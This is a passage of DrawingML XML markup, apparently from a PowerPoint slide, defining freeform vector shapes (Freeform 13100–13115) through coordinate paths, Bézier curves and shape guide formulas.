                  <a:gd name="T12" fmla="*/ 2634 w 2634"/>
                  <a:gd name="T13" fmla="*/ 468 h 706"/>
                  <a:gd name="T14" fmla="*/ 1739 w 2634"/>
                  <a:gd name="T15" fmla="*/ 227 h 7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34"/>
                  <a:gd name="T25" fmla="*/ 0 h 706"/>
                  <a:gd name="T26" fmla="*/ 2634 w 2634"/>
                  <a:gd name="T27" fmla="*/ 706 h 70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34" h="706">
                    <a:moveTo>
                      <a:pt x="1739" y="227"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="896" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="841" y="468"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1739" y="706"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2634" y="468"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1739" y="22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7" name="Freeform 13100"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5556" y="2438"/>
                <a:ext cx="139" cy="153"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 242 w 303"/>
                  <a:gd name="T1" fmla="*/ 97 h 333"/>
                  <a:gd name="T2" fmla="*/ 66 w 303"/>
                  <a:gd name="T3" fmla="*/ 21 h 333"/>
                  <a:gd name="T4" fmla="*/ 66 w 303"/>
                  <a:gd name="T5" fmla="*/ 21 h 333"/>
                  <a:gd name="T6" fmla="*/ 17 w 303"/>
                  <a:gd name="T7" fmla="*/ 34 h 333"/>
                  <a:gd name="T8" fmla="*/ 27 w 303"/>
                  <a:gd name="T9" fmla="*/ 55 h 333"/>
                  <a:gd name="T10" fmla="*/ 58 w 303"/>
                  <a:gd name="T11" fmla="*/ 236 h 333"/>
                  <a:gd name="T12" fmla="*/ 143 w 303"/>
                  <a:gd name="T13" fmla="*/ 305 h 333"/>
                  <a:gd name="T14" fmla="*/ 156 w 303"/>
                  <a:gd name="T15" fmla="*/ 333 h 333"/>
                  <a:gd name="T16" fmla="*/ 221 w 303"/>
                  <a:gd name="T17" fmla="*/ 315 h 333"/>
                  <a:gd name="T18" fmla="*/ 221 w 303"/>
                  <a:gd name="T19" fmla="*/ 315 h 333"/>
                  <a:gd name="T20" fmla="*/ 252 w 303"/>
                  <a:gd name="T21" fmla="*/ 301 h 333"/>
                  <a:gd name="T22" fmla="*/ 242 w 303"/>
                  <a:gd name="T23" fmla="*/ 97 h 3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3"/>
                  <a:gd name="T37" fmla="*/ 0 h 333"/>
                  <a:gd name="T38" fmla="*/ 303 w 303"/>
                  <a:gd name="T39" fmla="*/ 333 h 33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3" h="333">
                    <a:moveTo>
                      <a:pt x="242" y="97"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="191" y="31"/>
                      <a:pt x="118" y="0"/>
                      <a:pt x="66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0" y="100"/>
                      <a:pt x="11" y="174"/>
                      <a:pt x="58" y="236"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="268"/>
                      <a:pt x="113" y="292"/>
                      <a:pt x="143" y="305"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="156" y="333"/>
                      <a:pt x="156" y="333"/>
                      <a:pt x="156" y="333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2" y="313"/>
                      <a:pt x="243" y="308"/>
                      <a:pt x="252" y="301"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="303" y="262"/>
                      <a:pt x="298" y="171"/>
                      <a:pt x="242" y="97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" name="Freeform 13101"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5525" y="2443"/>
                <a:ext cx="140" cy="159"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 256 w 306"/>
                  <a:gd name="T1" fmla="*/ 308 h 346"/>
                  <a:gd name="T2" fmla="*/ 62 w 306"/>
                  <a:gd name="T3" fmla="*/ 243 h 346"/>
                  <a:gd name="T4" fmla="*/ 51 w 306"/>
                  <a:gd name="T5" fmla="*/ 39 h 346"/>
                  <a:gd name="T6" fmla="*/ 245 w 306"/>
                  <a:gd name="T7" fmla="*/ 104 h 346"/>
                  <a:gd name="T8" fmla="*/ 256 w 306"/>
                  <a:gd name="T9" fmla="*/ 308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6"/>
                  <a:gd name="T17" fmla="*/ 306 w 306"/>
                  <a:gd name="T18" fmla="*/ 346 h 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6">
                    <a:moveTo>
                      <a:pt x="256" y="308"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="205" y="346"/>
                      <a:pt x="118" y="317"/>
                      <a:pt x="62" y="243"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="0" y="77"/>
                      <a:pt x="51" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="0"/>
                      <a:pt x="188" y="29"/>
                      <a:pt x="245" y="104"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="301" y="178"/>
                      <a:pt x="306" y="269"/>
                      <a:pt x="256" y="308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9" name="Freeform 13102"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5552" y="2474"/>
                <a:ext cx="86" cy="97"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 156 w 186"/>
                  <a:gd name="T1" fmla="*/ 187 h 211"/>
                  <a:gd name="T2" fmla="*/ 38 w 186"/>
                  <a:gd name="T3" fmla="*/ 148 h 211"/>
                  <a:gd name="T4" fmla="*/ 31 w 186"/>
                  <a:gd name="T5" fmla="*/ 23 h 211"/>
                  <a:gd name="T6" fmla="*/ 149 w 186"/>
                  <a:gd name="T7" fmla="*/ 63 h 211"/>
                  <a:gd name="T8" fmla="*/ 156 w 186"/>
                  <a:gd name="T9" fmla="*/ 187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1"/>
                  <a:gd name="T17" fmla="*/ 186 w 186"/>
                  <a:gd name="T18" fmla="*/ 211 h 2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1">
                    <a:moveTo>
                      <a:pt x="156" y="187"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="125" y="211"/>
                      <a:pt x="72" y="193"/>
                      <a:pt x="38" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="102"/>
                      <a:pt x="0" y="47"/>
                      <a:pt x="31" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="0"/>
                      <a:pt x="115" y="18"/>
                      <a:pt x="149" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="183" y="108"/>
                      <a:pt x="186" y="164"/>
                      <a:pt x="156" y="18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0" name="Freeform 13103"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5628" y="2458"/>
                <a:ext cx="95" cy="104"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 184 w 207"/>
                  <a:gd name="T1" fmla="*/ 83 h 227"/>
                  <a:gd name="T2" fmla="*/ 142 w 207"/>
                  <a:gd name="T3" fmla="*/ 38 h 227"/>
                  <a:gd name="T4" fmla="*/ 0 w 207"/>
                  <a:gd name="T5" fmla="*/ 0 h 227"/>
                  <a:gd name="T6" fmla="*/ 41 w 207"/>
                  <a:gd name="T7" fmla="*/ 45 h 227"/>
                  <a:gd name="T8" fmla="*/ 100 w 207"/>
                  <a:gd name="T9" fmla="*/ 227 h 227"/>
                  <a:gd name="T10" fmla="*/ 100 w 207"/>
                  <a:gd name="T11" fmla="*/ 227 h 227"/>
                  <a:gd name="T12" fmla="*/ 185 w 207"/>
                  <a:gd name="T13" fmla="*/ 204 h 227"/>
                  <a:gd name="T14" fmla="*/ 185 w 207"/>
                  <a:gd name="T15" fmla="*/ 204 h 227"/>
                  <a:gd name="T16" fmla="*/ 205 w 207"/>
                  <a:gd name="T17" fmla="*/ 199 h 227"/>
                  <a:gd name="T18" fmla="*/ 184 w 207"/>
                  <a:gd name="T19" fmla="*/ 83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07"/>
                  <a:gd name="T31" fmla="*/ 0 h 227"/>
                  <a:gd name="T32" fmla="*/ 207 w 207"/>
                  <a:gd name="T33" fmla="*/ 227 h 2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07" h="227">
                    <a:moveTo>
                      <a:pt x="184" y="83"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="63"/>
                      <a:pt x="167" y="44"/>
                      <a:pt x="142" y="3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" y="13"/>
                      <a:pt x="29" y="28"/>
                      <a:pt x="41" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="104"/>
                      <a:pt x="106" y="172"/>
                      <a:pt x="100" y="227"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="227"/>
                      <a:pt x="100" y="227"/>
                      <a:pt x="100" y="227"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="185" y="204"/>
                      <a:pt x="185" y="204"/>
                      <a:pt x="185" y="204"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="185" y="204"/>
                      <a:pt x="185" y="204"/>
                      <a:pt x="185" y="204"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="205" y="199"/>
                      <a:pt x="205" y="199"/>
                      <a:pt x="205" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="205" y="157"/>
                      <a:pt x="207" y="128"/>
                      <a:pt x="184" y="8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1" name="Freeform 13104"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5957" y="2541"/>
                <a:ext cx="380" cy="102"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 610 w 1954"/>
                  <a:gd name="T1" fmla="*/ 525 h 525"/>
                  <a:gd name="T2" fmla="*/ 0 w 1954"/>
                  <a:gd name="T3" fmla="*/ 362 h 525"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1954"/>
                  <a:gd name="T5" fmla="*/ 0 h 525"/>
                  <a:gd name="T6" fmla="*/ 1954 w 1954"/>
                  <a:gd name="T7" fmla="*/ 154 h 525"/>
                  <a:gd name="T8" fmla="*/ 610 w 1954"/>
                  <a:gd name="T9" fmla="*/ 525 h 5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54"/>
                  <a:gd name="T16" fmla="*/ 0 h 525"/>
                  <a:gd name="T17" fmla="*/ 1954 w 1954"/>
                  <a:gd name="T18" fmla="*/ 525 h 5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54" h="525">
                    <a:moveTo>
                      <a:pt x="610" y="525"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1954" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="610" y="52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2" name="Freeform 13105"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6075" y="2571"/>
                <a:ext cx="262" cy="88"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 451 h 451"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 371 h 451"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 0 h 451"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 83 h 451"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9" fmla="*/ 451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4"/>
                  <a:gd name="T16" fmla="*/ 0 h 451"/>
                  <a:gd name="T17" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T18" fmla="*/ 451 h 4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4" h="451">
                    <a:moveTo>
                      <a:pt x="0" y="451"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="45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" name="Freeform 13106"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5720" y="2526"/>
                <a:ext cx="33" cy="48"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 173"/>
                  <a:gd name="T1" fmla="*/ 246 h 246"/>
                  <a:gd name="T2" fmla="*/ 173 w 173"/>
                  <a:gd name="T3" fmla="*/ 199 h 246"/>
                  <a:gd name="T4" fmla="*/ 173 w 173"/>
                  <a:gd name="T5" fmla="*/ 0 h 246"/>
                  <a:gd name="T6" fmla="*/ 0 w 173"/>
                  <a:gd name="T7" fmla="*/ 45 h 246"/>
                  <a:gd name="T8" fmla="*/ 0 w 173"/>
                  <a:gd name="T9" fmla="*/ 246 h 2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"/>
                  <a:gd name="T16" fmla="*/ 0 h 246"/>
                  <a:gd name="T17" fmla="*/ 173 w 173"/>
                  <a:gd name="T18" fmla="*/ 246 h 2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" h="246">
                    <a:moveTo>
                      <a:pt x="0" y="246"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="173" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="24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4" name="Freeform 13107"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5957" y="2599"/>
                <a:ext cx="118" cy="70"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 610"/>
                  <a:gd name="T1" fmla="*/ 0 h 361"/>
                  <a:gd name="T2" fmla="*/ 0 w 610"/>
                  <a:gd name="T3" fmla="*/ 198 h 361"/>
                  <a:gd name="T4" fmla="*/ 610 w 610"/>
                  <a:gd name="T5" fmla="*/ 361 h 361"/>
                  <a:gd name="T6" fmla="*/ 610 w 610"/>
                  <a:gd name="T7" fmla="*/ 163 h 361"/>
                  <a:gd name="T8" fmla="*/ 0 w 610"/>
                  <a:gd name="T9" fmla="*/ 0 h 3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10"/>
                  <a:gd name="T16" fmla="*/ 0 h 361"/>
                  <a:gd name="T17" fmla="*/ 610 w 610"/>
                  <a:gd name="T18" fmla="*/ 361 h 3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10" h="361">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="610" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="610" y="163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5" name="Freeform 13108"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5838" y="2567"/>
                <a:ext cx="119" cy="70"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 609"/>
                  <a:gd name="T1" fmla="*/ 0 h 361"/>
                  <a:gd name="T2" fmla="*/ 0 w 609"/>
                  <a:gd name="T3" fmla="*/ 198 h 361"/>
                  <a:gd name="T4" fmla="*/ 609 w 609"/>
                  <a:gd name="T5" fmla="*/ 361 h 361"/>
                  <a:gd name="T6" fmla="*/ 609 w 609"/>
                  <a:gd name="T7" fmla="*/ 163 h 361"/>
                  <a:gd name="T8" fmla="*/ 0 w 609"/>
                  <a:gd name="T9" fmla="*/ 0 h 3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9"/>
                  <a:gd name="T16" fmla="*/ 0 h 361"/>
                  <a:gd name="T17" fmla="*/ 609 w 609"/>
                  <a:gd name="T18" fmla="*/ 361 h 3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9" h="361">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="163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6" name="Freeform 13109"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5720" y="2535"/>
                <a:ext cx="118" cy="71"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 610"/>
                  <a:gd name="T1" fmla="*/ 0 h 361"/>
                  <a:gd name="T2" fmla="*/ 0 w 610"/>
                  <a:gd name="T3" fmla="*/ 198 h 361"/>
                  <a:gd name="T4" fmla="*/ 610 w 610"/>
                  <a:gd name="T5" fmla="*/ 361 h 361"/>
                  <a:gd name="T6" fmla="*/ 610 w 610"/>
                  <a:gd name="T7" fmla="*/ 163 h 361"/>
                  <a:gd name="T8" fmla="*/ 0 w 610"/>
                  <a:gd name="T9" fmla="*/ 0 h 3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10"/>
                  <a:gd name="T16" fmla="*/ 0 h 361"/>
                  <a:gd name="T17" fmla="*/ 610 w 610"/>
                  <a:gd name="T18" fmla="*/ 361 h 3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10" h="361">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="610" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="610" y="163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" name="Freeform 13110"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6075" y="2622"/>
                <a:ext cx="34" cy="47"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 170"/>
                  <a:gd name="T1" fmla="*/ 243 h 243"/>
                  <a:gd name="T2" fmla="*/ 170 w 170"/>
                  <a:gd name="T3" fmla="*/ 198 h 243"/>
                  <a:gd name="T4" fmla="*/ 170 w 170"/>
                  <a:gd name="T5" fmla="*/ 0 h 243"/>
                  <a:gd name="T6" fmla="*/ 0 w 170"/>
                  <a:gd name="T7" fmla="*/ 45 h 243"/>
                  <a:gd name="T8" fmla="*/ 0 w 170"/>
                  <a:gd name="T9" fmla="*/ 243 h 2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0"/>
                  <a:gd name="T16" fmla="*/ 0 h 243"/>
                  <a:gd name="T17" fmla="*/ 170 w 170"/>
                  <a:gd name="T18" fmla="*/ 243 h 2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0" h="243">
                    <a:moveTo>
                      <a:pt x="0" y="243"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="170" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="24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" name="Freeform 13111"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5427" y="2020"/>
                <a:ext cx="682" cy="592"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3505"/>
                  <a:gd name="T1" fmla="*/ 2093 h 3043"/>
                  <a:gd name="T2" fmla="*/ 3505 w 3505"/>
                  <a:gd name="T3" fmla="*/ 3043 h 3043"/>
                  <a:gd name="T4" fmla="*/ 3505 w 3505"/>
                  <a:gd name="T5" fmla="*/ 950 h 3043"/>
                  <a:gd name="T6" fmla="*/ 0 w 3505"/>
                  <a:gd name="T7" fmla="*/ 0 h 3043"/>
                  <a:gd name="T8" fmla="*/ 0 w 3505"/>
                  <a:gd name="T9" fmla="*/ 2093 h 30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05"/>
                  <a:gd name="T16" fmla="*/ 0 h 3043"/>
                  <a:gd name="T17" fmla="*/ 3505 w 3505"/>
                  <a:gd name="T18" fmla="*/ 3043 h 30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05" h="3043">
                    <a:moveTo>
                      <a:pt x="0" y="2093"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3505" y="3043"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3505" y="950"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="20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9" name="Freeform 13112"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5427" y="1926"/>
                <a:ext cx="1032" cy="279"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1797 w 5305"/>
                  <a:gd name="T1" fmla="*/ 0 h 1434"/>
                  <a:gd name="T2" fmla="*/ 0 w 5305"/>
                  <a:gd name="T3" fmla="*/ 484 h 1434"/>
                  <a:gd name="T4" fmla="*/ 3505 w 5305"/>
                  <a:gd name="T5" fmla="*/ 1434 h 1434"/>
                  <a:gd name="T6" fmla="*/ 5305 w 5305"/>
                  <a:gd name="T7" fmla="*/ 949 h 1434"/>
                  <a:gd name="T8" fmla="*/ 1797 w 5305"/>
                  <a:gd name="T9" fmla="*/ 0 h 14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305"/>
                  <a:gd name="T16" fmla="*/ 0 h 1434"/>
                  <a:gd name="T17" fmla="*/ 5305 w 5305"/>
                  <a:gd name="T18" fmla="*/ 1434 h 14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305" h="1434">
                    <a:moveTo>
                      <a:pt x="1797" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3505" y="1434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5305" y="949"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179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0" name="Freeform 13113"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6109" y="2110"/>
                <a:ext cx="350" cy="502"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1800"/>
                  <a:gd name="T1" fmla="*/ 2578 h 2578"/>
                  <a:gd name="T2" fmla="*/ 1800 w 1800"/>
                  <a:gd name="T3" fmla="*/ 2096 h 2578"/>
                  <a:gd name="T4" fmla="*/ 1800 w 1800"/>
                  <a:gd name="T5" fmla="*/ 0 h 2578"/>
                  <a:gd name="T6" fmla="*/ 0 w 1800"/>
                  <a:gd name="T7" fmla="*/ 485 h 2578"/>
                  <a:gd name="T8" fmla="*/ 0 w 1800"/>
                  <a:gd name="T9" fmla="*/ 2578 h 25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00"/>
                  <a:gd name="T16" fmla="*/ 0 h 2578"/>
                  <a:gd name="T17" fmla="*/ 1800 w 1800"/>
                  <a:gd name="T18" fmla="*/ 2578 h 25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00" h="2578">
                    <a:moveTo>
                      <a:pt x="0" y="2578"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1800" y="2096"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1800" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="485"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="257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" name="Freeform 13114"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6147" y="2586"/>
                <a:ext cx="123" cy="104"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 35 w 633"/>
                  <a:gd name="T1" fmla="*/ 536 h 536"/>
                  <a:gd name="T2" fmla="*/ 0 w 633"/>
                  <a:gd name="T3" fmla="*/ 446 h 536"/>
                  <a:gd name="T4" fmla="*/ 0 w 633"/>
                  <a:gd name="T5" fmla="*/ 349 h 536"/>
                  <a:gd name="T6" fmla="*/ 45 w 633"/>
                  <a:gd name="T7" fmla="*/ 182 h 536"/>
                  <a:gd name="T8" fmla="*/ 281 w 633"/>
                  <a:gd name="T9" fmla="*/ 0 h 536"/>
                  <a:gd name="T10" fmla="*/ 633 w 633"/>
                  <a:gd name="T11" fmla="*/ 87 h 536"/>
                  <a:gd name="T12" fmla="*/ 486 w 633"/>
                  <a:gd name="T13" fmla="*/ 413 h 536"/>
                  <a:gd name="T14" fmla="*/ 35 w 633"/>
                  <a:gd name="T15" fmla="*/ 536 h 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33"/>
                  <a:gd name="T25" fmla="*/ 0 h 536"/>
                  <a:gd name="T26" fmla="*/ 633 w 633"/>
                  <a:gd name="T27" fmla="*/ 536 h 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33" h="536">
                    <a:moveTo>
                      <a:pt x="35" y="536"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="349"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="633" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="486" y="413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="53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" name="Freeform 13115"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6188" y="2605"/>
                <a:ext cx="139" cy="153"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 242 w 303"/>
                  <a:gd name="T1" fmla="*/ 97 h 333"/>
                  <a:gd name="T2" fmla="*/ 66 w 303"/>
                  <a:gd name="T3" fmla="*/ 21 h 333"/>
                  <a:gd name="T4" fmla="*/ 66 w 303"/>
                  <a:gd name="T5" fmla="*/ 21 h 333"/>
                  <a:gd name="T6" fmla="*/ 17 w 303"/>
                  <a:gd name="T7" fmla="*/ 34 h 333"/>
                  <a:gd name="T8" fmla="*/ 27 w 303"/>
                  <a:gd name="T9" fmla="*/ 55 h 333"/>
                  <a:gd name="T10" fmla="*/ 58 w 303"/>
                  <a:gd name="T11" fmla="*/ 236 h 333"/>
                  <a:gd name="T12" fmla="*/ 143 w 303"/>
                  <a:gd name="T13" fmla="*/ 305 h 333"/>
                  <a:gd name="T14" fmla="*/ 156 w 303"/>
                  <a:gd name="T15" fmla="*/ 333 h 333"/>
                  <a:gd name="T16" fmla="*/ 222 w 303"/>
                  <a:gd name="T17" fmla="*/ 315 h 333"/>
                  <a:gd name="T18" fmla="*/ 222 w 303"/>
                  <a:gd name="T19" fmla="*/ 315 h 333"/>
                  <a:gd name="T20" fmla="*/ 252 w 303"/>
                  <a:gd name="T21" fmla="*/ 301 h 333"/>
                  <a:gd name="T22" fmla="*/ 242 w 303"/>
                  <a:gd name="T23" fmla="*/ 97 h 3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3"/>
                  <a:gd name="T37" fmla="*/ 0 h 333"/>
                  <a:gd name="T38" fmla="*/ 303 w 303"/>
                  <a:gd name="T39" fmla="*/ 333 h 33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3" h="333">
                    <a:moveTo>
                      <a:pt x="242" y="97"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="192" y="31"/>
                      <a:pt x="118" y="0"/>
                      <a:pt x="66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0" y="100"/>
                      <a:pt x="11" y="174"/>
                      <a:pt x="58" y="236"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="268"/>
                      <a:pt x="113" y="292"/>
                      <a:pt x="143" y="305"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="156" y="333"/>
                      <a:pt x="156" y="333"/>
                      <a:pt x="156" y="333"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="222" y="315"/>
                      <a:pt x="222" y="315"/>
                      <a:pt x="222" y="315"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="222" y="315"/>
